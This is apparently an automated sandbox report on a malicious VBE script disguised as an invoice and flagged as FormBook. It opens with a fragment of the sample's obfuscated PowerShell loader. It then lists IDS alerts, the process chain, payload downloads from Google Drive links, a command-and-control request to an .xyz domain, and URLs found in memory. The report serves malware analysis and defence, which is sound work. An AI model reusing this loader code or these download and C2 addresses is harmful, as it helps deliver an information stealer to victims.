';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnb u.SkibsSPseudESindsC Ja au tuiRAlvorI omneTFrilay
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T08:46:45.801662+020028032702Potentially Bad Traffic192.168.2.449738142.250.185.142443TCP
              2024-10-24T08:46:51.463960+020028032702Potentially Bad Traffic192.168.2.449740142.250.185.142443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T08:47:59.468104+020028554651A Network Trojan was detected192.168.2.450008104.21.70.1180TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: EL-25-536_40005512_Le Cuivre_23102024.vbeReversingLabs: Detection: 21%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32 source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nJPhzxOixucOn.exe, 0000000A.00000002.2965739593.000000000082E000.00000002.00000001.01000000.00000008.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2965710212.000000000082E000.00000002.00000001.01000000.00000008.sdmp
              Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dllhost.pdb source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbWP source: powershell.exe, 00000006.00000002.2131541455.00000000088F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32AC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll)g source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dllhost.pdbGCTL source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 4x nop then xor eax, eax11_2_030E9E90

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50008 -> 104.21.70.11:80
              Source: DNS query: www.akkushaber.xyz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 142.250.185.142:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49740 -> 142.250.185.142:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH HTTP/1.1Host: www.akkushaber.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; openframe/30.0.0.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH HTTP/1.1Host: www.akkushaber.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; openframe/30.0.0.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: www.akkushaber.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:47:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgNokXVGELP9%2BfLzpB99hN%2FKnyoWQIdOprmy2PD3sDhw3nfDUnXvCJSjXtircE68iYmgTl6qxO64%2FRILu1uT%2FCvUfalpRK9%2F%2B5pUDW71xy%2FPjdixl6dKAmYgaG74wJbHt3rl9Nw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7804c2aabf486a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1122&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=594&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 33 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 20 61 6d 70 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 33 37 39 63 34 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6b 61 72 79 61 65 73 63 6f 72 74 68 61 62 65 72 2e 70 72 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 30 2f 63 72 6f 70 70 65 64 2d 61 73 6c 61 6e 61 61 2d 33 32 78 33 32 2e 6a 70 65 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6b 61 72 79 61 65 73 63 6f 72 74 68 61 62 65 72 2e 70 72 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 30 2f 63 72 6f 70 70 65 Data Ascii: 7d39<!DOCTYPE html><html lang="tr" amp><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1"> <meta name="theme-color" content="#0379c4"><link rel="icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpeg" sizes="32x32"><link rel="icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/croppe
              Source: powershell.exe, 00000006.00000002.2123953554.0000000007880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B25EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2096188756.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B25EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2096188756.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.whatsapp.com/send?phone=
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aydingercekmasaj.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bedavabahis.xyz
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.ampproject.org/v0.js
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.ampproject.org/v0/amp-analytics-0.1.js
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.ampproject.org/v0/amp-sidebar-0.1.js
              Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B274E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/V8
              Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8P
              Source: powershell.exe, 00000006.00000002.2096188756.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8XR#l
              Source: msiexec.exe, msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294240633.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2688040815.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785462555.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294155314.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785880619.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785546396.0000000004C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4
              Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA41
              Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4Y
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: msiexec.exeString found in binary or memory: https://drive.usercontent.google.c
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B2634A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, msiexec.exe, 00000008.00000003.2294240633.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2688040815.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2241029730.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294155314.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785880619.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exeString found in binary or memory: https://drive.usercontent.google.com/downl
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B2634A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download
              Source: msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Lato%3A400%2C600%7CRoboto%3A300%2C400%2C500%2C700&#038;ver=6
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gazipasanakliyat.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://genelhaberler.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://girismarsbahis.xyz
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1909269428.0000024B26AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://haberinyeri.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://habersosyal.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://izmirgercekmasaj.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kayserigercekmasaj.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kutahyagercekmasaj.xyz
              Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://linkpoker.xyz
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.6.2
              Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/DERYA.gif)
